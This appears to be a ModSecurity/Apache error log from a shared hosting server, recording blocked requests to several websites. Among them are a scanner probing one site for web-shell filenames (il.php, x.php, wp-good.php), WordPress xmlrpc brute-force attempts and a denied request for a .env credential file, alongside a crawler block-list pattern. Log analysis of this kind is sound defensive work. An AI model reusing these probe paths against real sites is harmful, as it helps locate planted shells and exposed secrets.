[Tue May 26 13:55:41.167254 2026] [security2:error] [pid 560287:tid 560502] [client 40.83.92.30:6092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/admin.php"] [unique_id "ahVZBZmX5s6sDS3wJVco7QAAANQ"]
[Tue May 26 13:55:41.167349 2026] [security2:error] [pid 560287:tid 560502] [client 40.83.92.30:6092] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/admin.php"] [unique_id "ahVZBZmX5s6sDS3wJVco7QAAANQ"]
[Tue May 26 13:55:41.253206 2026] [security2:error] [pid 560287:tid 560457] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZBJmX5s6sDS3wJVco6AAAAKo"]
[Tue May 26 13:55:41.619110 2026] [security2:error] [pid 560287:tid 560506] [client 40.83.92.30:6113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/222.php"] [unique_id "ahVZBZmX5s6sDS3wJVco7wAAANg"]
[Tue May 26 13:55:41.619212 2026] [security2:error] [pid 560287:tid 560506] [client 40.83.92.30:6113] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/222.php"] [unique_id "ahVZBZmX5s6sDS3wJVco7wAAANg"]
[Tue May 26 13:55:41.672919 2026] [security2:error] [pid 560287:tid 560532] [client 114.119.153.138:62427] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/contact/"] [unique_id "ahVZBZmX5s6sDS3wJVco8AAAAPI"], referer: https://preetishah.com/
[Tue May 26 13:55:42.095850 2026] [security2:error] [pid 555743:tid 555906] [client 40.83.92.30:5769] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/themes/pridmag/il.php"] [unique_id "ahVZBsjqAquC0YaxQjDFbAAAASs"]
[Tue May 26 13:55:42.096040 2026] [security2:error] [pid 555743:tid 555906] [client 40.83.92.30:5769] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/themes/pridmag/il.php"] [unique_id "ahVZBsjqAquC0YaxQjDFbAAAASs"]
[Tue May 26 13:55:42.116922 2026] [security2:error] [pid 560287:tid 560503] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZBZmX5s6sDS3wJVco8gAAANU"]
[Tue May 26 13:55:42.118536 2026] [security2:error] [pid 555743:tid 555945] [client 106.192.248.115:58041] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZBsjqAquC0YaxQjDFbQAAAVI"]
[Tue May 26 13:55:42.120246 2026] [security2:error] [pid 555743:tid 555945] [client 106.192.248.115:58041] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZBsjqAquC0YaxQjDFbQAAAVI"]
[Tue May 26 13:55:42.606113 2026] [security2:error] [pid 555743:tid 555973] [client 40.83.92.30:6115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/info.php"] [unique_id "ahVZBsjqAquC0YaxQjDFcgAAAW4"]
[Tue May 26 13:55:42.606224 2026] [security2:error] [pid 555743:tid 555973] [client 40.83.92.30:6115] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/info.php"] [unique_id "ahVZBsjqAquC0YaxQjDFcgAAAW4"]
[Tue May 26 13:55:42.708289 2026] [security2:error] [pid 560287:tid 560348] [remote 69.12.57.100:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVZBJmX5s6sDS3wJVco6gAApzw"], referer: https://kingsclub.in/membership-club-in-bangalore/
[Tue May 26 13:55:43.070463 2026] [security2:error] [pid 555743:tid 555962] [client 40.83.92.30:5696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/a.php"] [unique_id "ahVZB8jqAquC0YaxQjDFfQAAAWM"]
[Tue May 26 13:55:43.070576 2026] [security2:error] [pid 555743:tid 555962] [client 40.83.92.30:5696] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/a.php"] [unique_id "ahVZB8jqAquC0YaxQjDFfQAAAWM"]
[Tue May 26 13:55:43.528742 2026] [security2:error] [pid 560287:tid 560440] [client 40.83.92.30:6123] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/chosen.php"] [unique_id "ahVZB5mX5s6sDS3wJVco_gAAAJs"]
[Tue May 26 13:55:43.528847 2026] [security2:error] [pid 560287:tid 560440] [client 40.83.92.30:6123] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/chosen.php"] [unique_id "ahVZB5mX5s6sDS3wJVco_gAAAJs"]
[Tue May 26 13:55:43.658462 2026] [security2:error] [pid 560287:tid 560549] [client 85.208.96.198:22400] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/halloween/day/2026-04-23/"] [unique_id "ahVZB5mX5s6sDS3wJVco_wAAAQE"]
[Tue May 26 13:55:43.658603 2026] [security2:error] [pid 560287:tid 560549] [client 85.208.96.198:22400] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/halloween/day/2026-04-23/"] [unique_id "ahVZB5mX5s6sDS3wJVco_wAAAQE"]
[Tue May 26 13:55:43.749003 2026] [security2:error] [pid 555743:tid 555979] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZB8jqAquC0YaxQjDFfgAAAXQ"]
[Tue May 26 13:55:44.037291 2026] [security2:error] [pid 560287:tid 560427] [client 40.83.92.30:6121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/index.php"] [unique_id "ahVZCJmX5s6sDS3wJVcpAQAAAI4"]
[Tue May 26 13:55:44.037446 2026] [security2:error] [pid 560287:tid 560427] [client 40.83.92.30:6121] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/index.php"] [unique_id "ahVZCJmX5s6sDS3wJVcpAQAAAI4"]
[Tue May 26 13:55:44.281467 2026] [security2:error] [pid 560287:tid 560435] [client 202.141.30.10:35359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZCJmX5s6sDS3wJVcpAgAAAJY"]
[Tue May 26 13:55:44.281649 2026] [security2:error] [pid 560287:tid 560435] [client 202.141.30.10:35359] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZCJmX5s6sDS3wJVcpAgAAAJY"]
[Tue May 26 13:55:44.499738 2026] [security2:error] [pid 560287:tid 560490] [client 40.83.92.30:5787] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVZCJmX5s6sDS3wJVcpBAAAAMk"]
[Tue May 26 13:55:44.730579 2026] [security2:error] [pid 560287:tid 560544] [client 40.83.92.30:5787] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wap.php"] [unique_id "ahVZCJmX5s6sDS3wJVcpBQAAAPw"]
[Tue May 26 13:55:44.730777 2026] [security2:error] [pid 560287:tid 560544] [client 40.83.92.30:5787] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wap.php"] [unique_id "ahVZCJmX5s6sDS3wJVcpBQAAAPw"]
[Tue May 26 13:55:45.175042 2026] [security2:error] [pid 555743:tid 555897] [client 40.83.92.30:5818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-admin/wp.php"] [unique_id "ahVZCcjqAquC0YaxQjDFigAAASI"]
[Tue May 26 13:55:45.175160 2026] [security2:error] [pid 555743:tid 555897] [client 40.83.92.30:5818] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-admin/wp.php"] [unique_id "ahVZCcjqAquC0YaxQjDFigAAASI"]
[Tue May 26 13:55:45.297929 2026] [security2:error] [pid 555743:tid 555908] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZCMjqAquC0YaxQjDFhwAAAS0"]
[Tue May 26 13:55:45.676947 2026] [security2:error] [pid 555743:tid 555934] [client 40.83.92.30:5779] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/aa.php"] [unique_id "ahVZCcjqAquC0YaxQjDFkgAAAUc"]
[Tue May 26 13:55:45.677054 2026] [security2:error] [pid 555743:tid 555934] [client 40.83.92.30:5779] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/aa.php"] [unique_id "ahVZCcjqAquC0YaxQjDFkgAAAUc"]
[Tue May 26 13:55:46.084887 2026] [security2:error] [pid 555743:tid 555972] [client 142.147.185.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVZCcjqAquC0YaxQjDFjQAAAW0"]
[Tue May 26 13:55:46.224159 2026] [security2:error] [pid 555743:tid 555958] [client 40.83.92.30:6116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/bolt.php"] [unique_id "ahVZCsjqAquC0YaxQjDFmAAAAV8"]
[Tue May 26 13:55:46.224282 2026] [security2:error] [pid 555743:tid 555958] [client 40.83.92.30:6116] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/bolt.php"] [unique_id "ahVZCsjqAquC0YaxQjDFmAAAAV8"]
[Tue May 26 13:55:46.748783 2026] [security2:error] [pid 555743:tid 555961] [client 40.83.92.30:5792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/bthil.php"] [unique_id "ahVZCsjqAquC0YaxQjDFogAAAWI"]
[Tue May 26 13:55:46.748918 2026] [security2:error] [pid 555743:tid 555961] [client 40.83.92.30:5792] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/bthil.php"] [unique_id "ahVZCsjqAquC0YaxQjDFogAAAWI"]
[Tue May 26 13:55:46.786161 2026] [security2:error] [pid 555743:tid 555978] [client 202.76.189.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZCsjqAquC0YaxQjDFnAAAAXM"]
[Tue May 26 13:55:47.126576 2026] [security2:error] [pid 560287:tid 560320] [remote 69.12.57.100:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVZCpmX5s6sDS3wJVcpCwAA1yA"], referer: https://kingsclub.in/membership-club-in-bangalore/
[Tue May 26 13:55:47.128961 2026] [security2:error] [pid 560287:tid 560444] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZCpmX5s6sDS3wJVcpCgAAAJ4"]
[Tue May 26 13:55:47.267165 2026] [cgid:error] [pid 560287:tid 560493] [client 40.83.92.30:5781] AH01265: stderr from /home2/svijakqj/bhavisharchitects.in/cgi-bin/: attempt to invoke directory as script
[Tue May 26 13:55:47.268189 2026] [security2:error] [pid 560287:tid 560493] [client 40.83.92.30:5781] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/cgi-sys/403.html"] [unique_id "ahVZC5mX5s6sDS3wJVcpDgAAAMw"]
[Tue May 26 13:55:47.503417 2026] [security2:error] [pid 560287:tid 560539] [client 40.83.92.30:5781] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/x.php"] [unique_id "ahVZC5mX5s6sDS3wJVcpDwAAAPc"]
[Tue May 26 13:55:47.503549 2026] [security2:error] [pid 560287:tid 560539] [client 40.83.92.30:5781] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/x.php"] [unique_id "ahVZC5mX5s6sDS3wJVcpDwAAAPc"]
[Tue May 26 13:55:47.963192 2026] [security2:error] [pid 555743:tid 555973] [client 40.83.92.30:6137] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/index/function.php"] [unique_id "ahVZC8jqAquC0YaxQjDFqQAAAW4"]
[Tue May 26 13:55:47.963327 2026] [security2:error] [pid 555743:tid 555973] [client 40.83.92.30:6137] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/index/function.php"] [unique_id "ahVZC8jqAquC0YaxQjDFqQAAAW4"]
[Tue May 26 13:55:48.180259 2026] [security2:error] [pid 555743:tid 555942] [client 129.222.147.134:43807] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZDMjqAquC0YaxQjDFqgAAAU8"]
[Tue May 26 13:55:48.180397 2026] [security2:error] [pid 555743:tid 555942] [client 129.222.147.134:43807] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZDMjqAquC0YaxQjDFqgAAAU8"]
[Tue May 26 13:55:48.413155 2026] [security2:error] [pid 555743:tid 555957] [client 40.83.92.30:6114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/aaa.php"] [unique_id "ahVZDMjqAquC0YaxQjDFsAAAAV4"]
[Tue May 26 13:55:48.413273 2026] [security2:error] [pid 555743:tid 555957] [client 40.83.92.30:6114] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/aaa.php"] [unique_id "ahVZDMjqAquC0YaxQjDFsAAAAV4"]
[Tue May 26 13:55:48.787488 2026] [security2:error] [pid 560287:tid 560473] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZDJmX5s6sDS3wJVcpEgAAALk"]
[Tue May 26 13:55:48.907922 2026] [security2:error] [pid 560287:tid 560448] [client 40.83.92.30:6118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/abcd.php"] [unique_id "ahVZDJmX5s6sDS3wJVcpFQAAAKI"]
[Tue May 26 13:55:48.908060 2026] [security2:error] [pid 560287:tid 560448] [client 40.83.92.30:6118] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/abcd.php"] [unique_id "ahVZDJmX5s6sDS3wJVcpFQAAAKI"]
[Tue May 26 13:55:49.409801 2026] [security2:error] [pid 555743:tid 555876] [client 40.83.92.30:5738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-good.php"] [unique_id "ahVZDcjqAquC0YaxQjDFuAAAAQ0"]
[Tue May 26 13:55:49.410001 2026] [security2:error] [pid 555743:tid 555876] [client 40.83.92.30:5738] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-good.php"] [unique_id "ahVZDcjqAquC0YaxQjDFuAAAAQ0"]
[Tue May 26 13:55:49.801252 2026] [authz_core:error] [pid 555743:tid 555930] [client 176.65.139.236:18504] AH01630: client denied by server configuration: /home2/azurm42s/public_html/erp/htdocs/.env
[Tue May 26 13:55:49.848378 2026] [security2:error] [pid 560287:tid 560442] [client 40.83.92.30:6105] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/edit-tags.php"] [unique_id "ahVZDZmX5s6sDS3wJVcpGQAAAJw"]
[Tue May 26 13:55:49.848496 2026] [security2:error] [pid 560287:tid 560442] [client 40.83.92.30:6105] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/edit-tags.php"] [unique_id "ahVZDZmX5s6sDS3wJVcpGQAAAJw"]
[Tue May 26 13:55:50.342003 2026] [security2:error] [pid 560287:tid 560443] [client 40.83.92.30:5817] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/themes/admin.php"] [unique_id "ahVZDpmX5s6sDS3wJVcpHwAAAJ0"]
[Tue May 26 13:55:50.342111 2026] [security2:error] [pid 560287:tid 560443] [client 40.83.92.30:5817] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/wp-content/themes/admin.php"] [unique_id "ahVZDpmX5s6sDS3wJVcpHwAAAJ0"]
[Tue May 26 13:55:50.587555 2026] [security2:error] [pid 555743:tid 555956] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZDsjqAquC0YaxQjDFvgAAAV0"]
[Tue May 26 13:55:50.843904 2026] [security2:error] [pid 560287:tid 560436] [client 40.83.92.30:5776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.in.svijaykumar.in"] [uri "/a7.php"] [unique_id "ahVZDpmX5s6sDS3wJVcpIwAAAJc"]
